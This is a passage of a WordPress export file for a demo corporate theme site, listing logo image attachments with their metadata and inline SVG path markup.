		<path class="st0" d="M84.8,8.1c0.2,0.4,0.5,0.9,0.7,1.5c0.3,0.6,0.6,1.2,0.9,1.9c0.3,0.7,0.6,1.4,0.9,2.1s0.6,1.4,0.8,2    c0.3-0.6,0.5-1.3,0.8-2s0.6-1.4,0.9-2.1c0.3-0.7,0.6-1.3,0.9-1.9c0.3-0.6,0.5-1.1,0.7-1.5h2.6c0.1,0.8,0.2,1.8,0.3,2.8    c0.1,1,0.2,2.1,0.3,3.2c0.1,1.1,0.1,2.2,0.2,3.3c0.1,1.1,0.1,2.2,0.2,3.2h-2.7c0-1.2-0.1-2.5-0.1-4c-0.1-1.4-0.2-2.9-0.3-4.3    c-0.2,0.5-0.5,1.1-0.7,1.7c-0.3,0.6-0.5,1.2-0.8,1.8c-0.3,0.6-0.5,1.2-0.7,1.8c-0.2,0.6-0.4,1-0.6,1.4h-2    c-0.2-0.4-0.4-0.9-0.6-1.4c-0.2-0.6-0.5-1.1-0.8-1.8c-0.3-0.6-0.5-1.2-0.8-1.8c-0.3-0.6-0.5-1.2-0.7-1.7c-0.1,1.5-0.2,2.9-0.3,4.3    c-0.1,1.4-0.1,2.7-0.1,4h-2.7c0-1,0.1-2,0.2-3.2c0.1-1.1,0.1-2.2,0.2-3.3c0.1-1.1,0.2-2.2,0.3-3.2c0.1-1,0.2-2,0.3-2.8H84.8z"></path>
		<path class="st0" d="M97,15.9c0-0.8,0.1-1.6,0.4-2.2c0.3-0.6,0.6-1.2,1-1.6c0.4-0.4,0.9-0.7,1.4-1c0.5-0.2,1.1-0.3,1.7-0.3    c1.3,0,2.4,0.4,3.2,1.2c0.8,0.8,1.2,2,1.2,3.6c0,0.2,0,0.3,0,0.5c0,0.2,0,0.4,0,0.5h-6.1c0.1,0.6,0.3,1,0.8,1.3s1.1,0.5,1.8,0.5    c0.5,0,1,0,1.4-0.1c0.5-0.1,0.9-0.2,1.2-0.3l0.4,2.2c-0.1,0.1-0.3,0.1-0.6,0.2c-0.2,0.1-0.5,0.1-0.8,0.2c-0.3,0.1-0.6,0.1-0.9,0.1    s-0.7,0.1-1,0.1c-0.9,0-1.6-0.1-2.2-0.4s-1.2-0.6-1.6-1c-0.4-0.4-0.7-1-0.9-1.6C97.1,17.2,97,16.6,97,15.9z M103.3,14.9    c0-0.2-0.1-0.4-0.1-0.7c-0.1-0.2-0.2-0.4-0.3-0.6c-0.1-0.2-0.3-0.3-0.5-0.4c-0.2-0.1-0.5-0.2-0.8-0.2c-0.3,0-0.6,0.1-0.8,0.2    c-0.2,0.1-0.4,0.2-0.5,0.4c-0.1,0.2-0.3,0.4-0.3,0.6c-0.1,0.2-0.1,0.4-0.2,0.7H103.3z"></path>
		<path class="st0" d="M116.4,20.2c-0.2,0.1-0.5,0.1-0.8,0.2c-0.3,0.1-0.6,0.1-1,0.2c-0.3,0-0.7,0.1-1,0.1c-0.4,0-0.7,0-1,0    c-0.8,0-1.5-0.1-2.1-0.3c-0.6-0.2-1.1-0.6-1.5-1c-0.4-0.4-0.7-0.9-1-1.5c-0.2-0.6-0.3-1.3-0.3-2c0-0.8,0.1-1.5,0.3-2.1    c0.2-0.6,0.5-1.1,0.8-1.6c0.4-0.4,0.8-0.8,1.3-1c0.5-0.2,1.1-0.3,1.8-0.3c0.4,0,0.7,0,1,0.1c0.3,0.1,0.6,0.2,0.9,0.3V7l2.7-0.4    V20.2z M110.3,15.7c0,0.8,0.2,1.5,0.6,2s0.9,0.8,1.7,0.8c0.2,0,0.5,0,0.7,0c0.2,0,0.4,0,0.5-0.1v-4.9c-0.2-0.1-0.4-0.2-0.7-0.3    c-0.3-0.1-0.5-0.1-0.8-0.1C110.9,13.2,110.3,14,110.3,15.7z"></path>
		<path class="st0" d="M121.8,8.3c0,0.5-0.2,0.9-0.5,1.2s-0.7,0.4-1.1,0.4c-0.4,0-0.8-0.1-1.1-0.4s-0.5-0.7-0.5-1.2s0.2-0.9,0.5-1.2    c0.3-0.3,0.7-0.4,1.1-0.4c0.4,0,0.8,0.1,1.1,0.4C121.6,7.5,121.8,7.9,121.8,8.3z M121.6,20.6h-2.7v-9.5h2.7V20.6z"></path>
		<path class="st0" d="M127.5,10.8c0.8,0,1.5,0.1,2,0.3c0.5,0.2,1,0.4,1.3,0.8c0.3,0.3,0.5,0.7,0.7,1.2c0.1,0.5,0.2,1,0.2,1.6v5.6    c-0.4,0.1-0.9,0.2-1.6,0.3c-0.7,0.1-1.5,0.2-2.5,0.2c-0.6,0-1.2-0.1-1.7-0.2c-0.5-0.1-0.9-0.3-1.3-0.5s-0.6-0.6-0.8-1    c-0.2-0.4-0.3-0.9-0.3-1.5c0-0.6,0.1-1,0.3-1.4c0.2-0.4,0.5-0.7,0.9-0.9c0.4-0.2,0.8-0.4,1.3-0.5c0.5-0.1,1-0.2,1.5-0.2    c0.3,0,0.7,0,0.9,0c0.3,0,0.5,0.1,0.7,0.1v-0.3c0-0.5-0.1-0.8-0.4-1.1c-0.3-0.3-0.8-0.4-1.4-0.4c-0.5,0-0.9,0-1.4,0.1    c-0.4,0.1-0.8,0.2-1.2,0.3l-0.3-2.2c0.2,0,0.4-0.1,0.6-0.2c0.2-0.1,0.5-0.1,0.8-0.1c0.3,0,0.6-0.1,0.9-0.1    C126.9,10.8,127.2,10.8,127.5,10.8z M127.7,18.7c0.3,0,0.5,0,0.8,0s0.4,0,0.6-0.1v-2c-0.1,0-0.3,0-0.5-0.1c-0.2,0-0.4,0-0.6,0    c-0.3,0-0.5,0-0.7,0s-0.4,0.1-0.6,0.2s-0.3,0.2-0.4,0.3c-0.1,0.1-0.1,0.3-0.1,0.5c0,0.4,0.1,0.7,0.4,0.9S127.2,18.7,127.7,18.7z"></path>
	</g>
	<g>
		<g>
			<path class="st0" d="M5.5,6.5V0H4.8C2.2,0,0,2.2,0,4.8v1.7H5.5z"></path>
		</g>
		<g>
			<path class="st0" d="M25.1,8.4h4.8V4.8c0-2.6-2.1-4.8-4.8-4.8V8.4z"></path>
		</g>
		<g>
			<path class="st0" d="M21.6,25.1v4.7H25c2.6,0,4.8-2.1,4.8-4.7H21.6z"></path>
		</g>
		<g>
			<path class="st0" d="M6.7,23.8H0v-1.5h7.4c0.4,0,0.8,0.3,0.8,0.8v6.8h2.2v-9.4H6c-0.4,0-0.8-0.3-0.8-0.8V14     c-0.5-0.3-0.9-0.9-0.9-1.5c0-0.9,0.8-1.7,1.7-1.7c0.9,0,1.7,0.8,1.7,1.7c0,0.7-0.4,1.3-1,1.6V19h4.4c0.4,0,0.8,0.3,0.8,0.8v10.1     h3.4v-3.4c-0.6-0.3-1-0.9-1-1.6c0-0.9,0.8-1.7,1.7-1.7s1.7,0.8,1.7,1.7c0,0.7-0.4,1.2-0.9,1.5v3.4H20v-5.5c0-0.4,0.3-0.8,0.8-0.8     h9v-9.5h-3v4.7c0,0.4-0.3,0.8-0.8,0.8h-5.5c-0.3,0.6-0.9,1-1.6,1c-0.9,0-1.7-0.8-1.7-1.7c0-0.9,0.8-1.7,1.7-1.7     c0.7,0,1.2,0.4,1.5,0.9h4.8v-4.7c0-0.4,0.3-0.8,0.8-0.8h3.7V9.9h-5.5c-0.4,0-0.8-0.3-0.8-0.8V0h-8.2v2.7h5.1     c0.4,0,0.8,0.3,0.8,0.8v5.6c0.6,0.3,1,0.9,1,1.6c0,0.9-0.8,1.7-1.7,1.7c-0.9,0-1.7-0.8-1.7-1.7c0-0.7,0.4-1.2,0.9-1.5V4.2h-5.1     c-0.4,0-0.8-0.3-0.8-0.8V0h-3.7v5.6h3.1c0.4,0,0.8,0.3,0.8,0.8v7c0.6,0.3,1,0.9,1,1.6c0,0.9-0.8,1.7-1.7,1.7     c-0.9,0-1.7-0.8-1.7-1.7c0-0.6,0.4-1.2,0.9-1.5V7.1H9.4C9,7.1,8.6,6.7,8.6,6.3V0H7v7.2C7,7.7,6.7,8,6.3,8H0v17     c0,2.7,2.2,4.8,4.8,4.8h1.9V23.8z"></path>
		</g>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>03</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/faqs/03-2/</link>
		<pubDate>Tue, 08 Sep 2020 10:44:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/03-1.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>585</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 10:44:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 10:44:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[03-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/03-1.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/03-1.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 141.3 30" style="enable-background:new 0 0 141.3 30;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#9E9E9E;}
</style>
<g id="_x33_">
	<g>
		<path class="st0" d="M63.8,17.8c0,0.7-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5c-0.4,0.4-0.9,0.8-1.5,1c-0.6,0.2-1.2,0.4-1.9,0.4    c-0.7,0-1.4-0.1-2-0.4c-0.6-0.2-1.1-0.6-1.6-1c-0.4-0.4-0.8-0.9-1.1-1.5c-0.3-0.6-0.4-1.2-0.4-1.9c0-0.7,0.1-1.3,0.4-1.9    c0.3-0.6,0.6-1.1,1-1.5c0.4-0.4,1-0.8,1.6-1c0.6-0.2,1.3-0.4,1.9-0.4c0.8,0,1.5,0.2,2.2,0.5c0.7,0.3,1.3,0.8,1.7,1.3l-1.6,1.4    c-0.3-0.4-0.7-0.7-1-0.9s-0.8-0.3-1.3-0.3c-0.4,0-0.7,0.1-1,0.2c-0.3,0.1-0.6,0.3-0.8,0.6s-0.4,0.5-0.5,0.9    c-0.1,0.3-0.2,0.7-0.2,1.1c0,0.4,0.1,0.8,0.2,1.1c0.1,0.3,0.3,0.6,0.6,0.9s0.5,0.4,0.8,0.6c0.3,0.1,0.7,0.2,1.1,0.2    c0.5,0,1-0.1,1.4-0.4c0.4-0.3,0.7-0.6,0.8-1.1h-2.5v-2h5V17.8z"></path>
		<path class="st0" d="M65,22.5v-9.3h4.8c0.5,0,0.9,0.1,1.3,0.2c0.4,0.1,0.7,0.4,1,0.6c0.3,0.3,0.5,0.6,0.7,0.9    c0.2,0.4,0.2,0.8,0.2,1.2c0,0.6-0.2,1.1-0.5,1.6c-0.3,0.5-0.7,0.8-1.3,1.1l2,3.7h-2.6L69,19.1h-1.7v3.4H65z M69.6,15.1h-2.3v2.1    h2.3c0.4,0,0.6-0.1,0.9-0.3c0.2-0.2,0.3-0.4,0.3-0.8c0-0.3-0.1-0.6-0.3-0.8C70.2,15.2,69.9,15.1,69.6,15.1z"></path>
		<path class="st0" d="M74.2,22.5v-9.3h7.3v2h-5.1v1.7h3.3v1.9h-3.3v1.8h5.1v2H74.2z"></path>
		<path class="st0" d="M83,22.5v-9.3h7.3v2h-5.1v1.7h3.3v1.9h-3.3v1.8h5.1v2H83z"></path>
		<path class="st0" d="M91.7,13.2h2.2l4.2,5.4v-5.4h2.2v9.3h-2l-4.4-5.6v5.6h-2.2V13.2z"></path>
		<path class="st0" d="M104.4,22.5v-9.3h2.3v3.6h3.8v-3.6h2.3v9.3h-2.3v-3.6h-3.8v3.6H104.4z"></path>
		<path class="st0" d="M123.9,17.8c0,0.7-0.1,1.3-0.4,1.9c-0.3,0.6-0.6,1.1-1.1,1.5c-0.4,0.4-1,0.8-1.6,1c-0.6,0.2-1.3,0.4-2,0.4    c-0.7,0-1.3-0.1-2-0.4c-0.6-0.2-1.1-0.6-1.6-1c-0.4-0.4-0.8-0.9-1-1.5c-0.3-0.6-0.4-1.2-0.4-1.9c0-0.7,0.1-1.3,0.4-1.9    c0.3-0.6,0.6-1.1,1-1.5c0.4-0.4,1-0.8,1.6-1c0.6-0.2,1.3-0.4,2-0.4c0.7,0,1.3,0.1,2,0.4c0.6,0.2,1.1,0.6,1.6,1    c0.4,0.4,0.8,0.9,1.1,1.5C123.8,16.5,123.9,17.2,123.9,17.8z M121.6,17.8c0-0.4-0.1-0.7-0.2-1.1c-0.1-0.3-0.3-0.6-0.6-0.9    s-0.5-0.4-0.8-0.6c-0.3-0.1-0.7-0.2-1-0.2c-0.4,0-0.7,0.1-1,0.2c-0.3,0.1-0.6,0.3-0.8,0.6c-0.2,0.2-0.4,0.5-0.6,0.9    c-0.1,0.3-0.2,0.7-0.2,1.1c0,0.4,0.1,0.7,0.2,1.1c0.1,0.3,0.3,0.6,0.6,0.9c0.2,0.2,0.5,0.4,0.8,0.6c0.3,0.1,0.7,0.2,1,0.2    c0.4,0,0.7-0.1,1-0.2c0.3-0.1,0.6-0.3,0.8-0.6c0.2-0.2,0.4-0.5,0.6-0.9C121.5,18.6,121.6,18.2,121.6,17.8z"></path>
		<path class="st0" d="M124.4,21.1l1.3-1.7c0.6,0.5,1.1,0.8,1.6,1c0.5,0.2,1,0.3,1.5,0.3c0.5,0,0.9-0.1,1.2-0.2    c0.3-0.2,0.4-0.4,0.4-0.7c0-0.3-0.1-0.5-0.3-0.6c-0.2-0.1-0.5-0.3-1-0.3l-2-0.4c-0.8-0.1-1.3-0.4-1.7-0.9c-0.4-0.4-0.6-1-0.6-1.7    c0-0.9,0.3-1.6,1-2.1c0.7-0.5,1.6-0.8,2.8-0.8c0.7,0,1.4,0.1,2.1,0.4c0.7,0.2,1.3,0.6,1.8,1l-1.2,1.7c-0.5-0.4-1-0.7-1.4-0.8    c-0.5-0.2-0.9-0.3-1.4-0.3c-0.5,0-0.8,0.1-1.1,0.2c-0.3,0.1-0.4,0.3-0.4,0.6c0,0.2,0.1,0.4,0.3,0.5c0.2,0.1,0.5,0.2,0.8,0.3    l1.9,0.3c0.9,0.1,1.6,0.4,2,0.9c0.5,0.5,0.7,1,0.7,1.8c0,0.9-0.4,1.7-1.1,2.2c-0.7,0.5-1.7,0.8-3,0.8c-0.7,0-1.5-0.1-2.2-0.4    C125.6,21.9,125,21.6,124.4,21.1z"></path>
		<path class="st0" d="M132.9,15.2v-2h8.4v2h-3v7.3H136v-7.3H132.9z"></path>
	</g>
	<path class="st0" d="M25.3,19.9c2.1,0,3.9-1.7,3.9-3.9s-1.7-3.9-3.9-3.9s-3.9,1.7-3.9,3.9S23.2,19.9,25.3,19.9z M13.9,23.1   c-1.4,0-2.5,1.1-2.5,2.5c0,1.4,1.1,2.5,2.5,2.5c1.4,0,2.5-1.1,2.5-2.5C16.5,24.2,15.3,23.1,13.9,23.1z M33.5,25.3   c-1,0-1.8,0.8-1.8,1.8s0.8,1.8,1.8,1.8c1,0,1.8-0.8,1.8-1.8S34.5,25.3,33.5,25.3z M43.8,16.3c-0.2-2.9-2.6-5.3-5.5-5.5   c-2.7-0.2-5,1.4-6,3.6l0,0c0,0,0,0,0,0l-1.7,4.1c-0.8,2-2.5,3.5-4.5,4.2h0c-1.4,0.5-3,0.1-4.1-0.9c-0.4-0.4-0.8-0.8-0.8-0.8   c-0.9-0.8-1.5-1.9-1.7-3.1c-0.1-0.4-0.1-0.8-0.1-1.2l0.2-4.5l0.1-2.1l0,0c0-0.1,0-0.1,0-0.2c0-5.7-4.8-10.2-10.5-9.8   C4.3,0.4,0.4,4.3,0,9.1C0,10,0,10.8,0.2,11.6c0.8,4.6,4.8,8,9.7,8c0.2,0,4.3,0.3,5.9,1.2l1.1,0.6c1.1,0.6,1.9,1.6,2.4,2.7l1.4,3.4   l0,0c0.4,1.4,1.6,2.5,3.2,2.5c1,0,2-0.5,2.6-1.2c0.5-0.6,4.1-4.2,4.1-4.2c0.8-0.9,2-1.4,3.2-1.5l4.8-0.3c2.5-0.2,4.5-1.9,5.3-4.2   c0.2-0.6,0.3-1.2,0.3-1.8C43.8,16.6,43.8,16.4,43.8,16.3z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>04</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/faqs/04-2/</link>
		<pubDate>Tue, 08 Sep 2020 10:44:25 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/04-1.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>586</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 10:44:25]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 10:44:25]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[04-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/04-1.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/04-1.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 88.4 30.4" style="enable-background:new 0 0 88.4 30.4;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#9E9E9E;}
</style>
<g id="_x34_">
	<path class="st0" d="M21.9,6c1.2,1,2.8,1.5,4.6,1.4c0.6,0,1.2-0.1,1.9-0.2c-1.2-1.9-2.8-3.6-4.8-4.9c-1.9-1.2-3.9-1.9-5.9-2.2   l1.8,2.8C20.1,4,20.9,5.2,21.9,6z M5.5,18.4C6.2,17.2,6.9,16,7,14.7c0.1-1-0.3-2.1-0.7-3.2L6,10.4C5.4,8.9,4.7,7.4,4.1,6   C4,5.8,3.9,5.7,3.9,5.6c0-0.1-0.1-0.1-0.1-0.2c0-0.1-0.1-0.2-0.1-0.2C3.2,5.7,2.8,6.2,2.4,6.8c-3.7,5.8-3,13,1.1,18   c-0.1-1.3,0.1-2.6,0.6-3.8C4.5,20.1,5,19.3,5.5,18.4z M30.1,18.9c0,0-0.1,0-0.1,0c-0.2,0-0.4,0-0.6,0c-0.1,0-0.2,0-0.2,0   c-1.4,0.2-2.6,0.5-3.7,1.1c-1.4,0.9-2.2,2.5-2.1,4.1c0,0.5,0.1,0.9,0.2,1.4c0.1,0.7,0.3,1.4,0.3,2.1c1.7-1.1,3.1-2.6,4.3-4.4   C29,21.9,29.7,20.4,30.1,18.9z M29.3,16.6c0.4-0.1,0.8-0.2,1.2-0.2c0.1-1.5,0-3-0.3-4.5c-0.2,0-0.4,0.1-0.5,0.1   c-0.9,0.2-1.8,0.5-2.7,0.9c-0.5,0.2-1,0.4-1.4,0.5c-1.3,0.4-3.2,0.9-5.1,0.5c-0.7-0.2-1.3-0.4-1.9-0.8c-1.1-0.7-2-1.8-2.5-3   c-0.4-1.1-0.5-2.2-0.6-3.3c0-0.6-0.1-1.1-0.2-1.6c-0.1-0.9-0.4-1.8-0.9-2.7c-0.5-1-1-1.7-1.5-2.3C10.9,0.3,9,1,7.3,2   C7.2,2.4,7,2.7,7,3C6.7,4.8,8,6.6,9,7.8C9.1,8,9.2,8.2,9.4,8.3c1.3,1.5,2.7,3.3,3,5.5c0.3,2.3-0.6,4.3-1.4,6.2   c-0.7,1.5-1.3,2.9-1.3,4.4c0,1.7,0.9,3.5,2.5,5c0.3,0.3,0.7,0.6,1.1,0.9c0.9,0.1,1.8,0.2,2.7,0.1c0.4-0.3,0.8-0.5,1.1-0.9   c0.8-1,1-2.4,1.1-3.8c0-0.2,0-0.4,0-0.6c0.1-1.5,0.1-3,0.8-4.5c0.8-1.7,2.3-3.1,4-3.6c1.3-0.4,2.7-0.4,4.1-0.4l0.1,0   c0.7,0,1.4,0.1,2,0C29.2,16.6,29.3,16.6,29.3,16.6z"></path>
	<g>
		<path class="st0" d="M48.2,15.5v4.9h-2.4v-4.9l-3.8-7.8h2.5l2.4,5.5l2.4-5.5H52L48.2,15.5z"></path>
		<path class="st0" d="M53.5,20.1c-0.6-0.3-1-0.8-1.3-1.4c-0.3-0.6-0.5-1.3-0.5-2.1v-1.5c0-0.8,0.2-1.5,0.5-2.1    c0.3-0.6,0.8-1,1.3-1.3c0.6-0.3,1.3-0.5,2.1-0.5s1.5,0.2,2.1,0.5c0.6,0.3,1,0.8,1.3,1.3c0.3,0.6,0.5,1.3,0.5,2.1v1.5    c0,0.8-0.2,1.5-0.5,2.1c-0.3,0.6-0.8,1-1.3,1.3c-0.6,0.3-1.3,0.5-2.1,0.5S54.1,20.4,53.5,20.1z M56.8,17.8    c0.3-0.3,0.4-0.7,0.4-1.2v-1.5c0-0.5-0.1-0.9-0.4-1.2s-0.6-0.4-1.1-0.4c-0.5,0-0.9,0.1-1.1,0.4c-0.3,0.3-0.4,0.7-0.4,1.2v1.5    c0,0.5,0.1,0.9,0.4,1.2c0.3,0.3,0.6,0.4,1.1,0.4S56.5,18.1,56.8,17.8z"></path>
		<path class="st0" d="M63,20.1c-0.5-0.3-0.8-0.8-1-1.3c-0.2-0.6-0.4-1.3-0.4-2.1v-1.5c0-0.8,0.1-1.6,0.4-2.2s0.6-1.1,1-1.4    s1-0.5,1.7-0.5c0.5,0,0.9,0.1,1.3,0.4c0.4,0.3,0.7,0.7,1,1.2l-0.2,2c0-0.3-0.1-0.6-0.2-0.8s-0.3-0.4-0.5-0.5    c-0.2-0.1-0.4-0.2-0.7-0.2c-0.5,0-0.8,0.2-1.1,0.5c-0.2,0.3-0.4,0.7-0.4,1.3v1.5c0,0.5,0.1,1,0.4,1.3s0.6,0.4,1.1,0.4    c0.3,0,0.5-0.1,0.7-0.2c0.2-0.1,0.4-0.3,0.5-0.5s0.2-0.5,0.2-0.8l0.1,2.1c-0.2,0.5-0.5,0.9-0.9,1.2c-0.4,0.3-0.8,0.4-1.4,0.4    C64,20.6,63.4,20.4,63,20.1z M66.7,7.7h2.4v12.8h-2.4V7.7z"></path>
		<path class="st0" d="M72.7,20.1c-0.5-0.3-0.8-0.8-1-1.3c-0.2-0.6-0.4-1.3-0.4-2.1v-1.5c0-0.8,0.1-1.6,0.4-2.2s0.6-1.1,1-1.4    s1-0.5,1.7-0.5c0.5,0,0.9,0.1,1.3,0.4c0.4,0.3,0.7,0.7,1,1.2l-0.2,2c0-0.3-0.1-0.6-0.2-0.8s-0.3-0.4-0.5-0.5    c-0.2-0.1-0.4-0.2-0.7-0.2c-0.5,0-0.8,0.2-1.1,0.5c-0.2,0.3-0.4,0.7-0.4,1.3v1.5c0,0.5,0.1,1,0.4,1.3s0.6,0.4,1.1,0.4    c0.3,0,0.5-0.1,0.7-0.2c0.2-0.1,0.4-0.3,0.5-0.5s0.2-0.5,0.2-0.8l0.1,2.1c-0.2,0.5-0.5,0.9-0.9,1.2c-0.4,0.3-0.8,0.4-1.4,0.4    C73.7,20.6,73.1,20.4,72.7,20.1z M73.7,24.2c0,0-0.3-0.1-0.9-0.4c-0.6-0.3-1-0.6-1.3-1.1l1.6-1.5c0.2,0.2,0.5,0.4,0.7,0.5    c0.3,0.1,0.6,0.2,0.9,0.2c0.5,0,0.9-0.1,1.2-0.4c0.3-0.3,0.5-0.7,0.5-1.1v-9h2.4v8.9c0,0.8-0.2,1.6-0.5,2.2    c-0.3,0.6-0.8,1.1-1.4,1.4s-1.4,0.5-2.2,0.5C74,24.2,73.7,24.2,73.7,24.2z"></path>
		<path class="st0" d="M80,11.3h2.3l3.1,7.9l-1.5,1.9L80,11.3z M88.4,11.3l-4.1,11.3c-0.2,0.4-0.3,0.7-0.6,1    c-0.2,0.2-0.5,0.4-0.8,0.5c-0.3,0.1-0.7,0.2-1.2,0.2h-0.5v-2.3h0.5c0.3,0,0.5-0.1,0.6-0.2c0.2-0.1,0.3-0.3,0.4-0.6l3.4-9.9H88.4z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>05</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/faqs/05-2/</link>
		<pubDate>Tue, 08 Sep 2020 10:44:26 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/05-1.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>587</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 10:44:26]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 10:44:26]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[05-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/05-1.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/05-1.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 143.2 31.3" style="enable-background:new 0 0 143.2 31.3;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#9E9E9E;}
</style>
<g id="_x35_">
	<g>
		<path class="st0" d="M57.2,20.5h-3.1l-0.9-2.8h-4.5l-0.9,2.8h-3.1l4.6-12.6h3.4L57.2,20.5z M52.6,15.6l-1.4-4.2    C51.1,11,51,10.6,51,10.2h-0.1c0,0.4-0.1,0.7-0.2,1.1l-1.4,4.3H52.6z"></path>
		<path class="st0" d="M63.9,20.4c-0.4,0.2-1,0.3-1.9,0.3c-2,0-2.9-1-2.9-3v-4.1h-1.5v-2h1.5V9.6l2.8-0.8v2.7h2v2h-2v3.6    c0,0.9,0.4,1.4,1.1,1.4c0.3,0,0.6-0.1,0.9-0.3V20.4z"></path>
		<path class="st0" d="M69.8,20.8c-1.5,0-2.7-0.4-3.5-1.3s-1.3-2-1.3-3.4c0-1.5,0.4-2.7,1.3-3.5c0.9-0.8,2.1-1.3,3.6-1.3    c1.5,0,2.7,0.4,3.5,1.3c0.8,0.8,1.3,2,1.3,3.3c0,1.5-0.4,2.7-1.3,3.5S71.3,20.8,69.8,20.8z M69.9,13.5c-0.7,0-1.2,0.2-1.5,0.7    s-0.5,1.1-0.5,1.9c0,1.7,0.7,2.6,2.1,2.6c1.3,0,2-0.9,2-2.7C71.9,14.3,71.2,13.5,69.9,13.5z"></path>
		<path class="st0" d="M90.8,20.5H88v-5.1c0-1.3-0.5-2-1.4-2c-0.5,0-0.8,0.2-1.1,0.6S85,14.9,85,15.5v5h-2.8v-5.2    c0-1.3-0.5-1.9-1.4-1.9c-0.5,0-0.9,0.2-1.1,0.6c-0.3,0.4-0.4,0.9-0.4,1.5v5h-2.8v-9h2.8V13h0c0.3-0.5,0.7-0.9,1.2-1.2    c0.5-0.3,1.1-0.5,1.7-0.5c1.3,0,2.1,0.6,2.6,1.7c0.7-1.1,1.7-1.7,3-1.7c2,0,2.9,1.2,2.9,3.6V20.5z"></path>
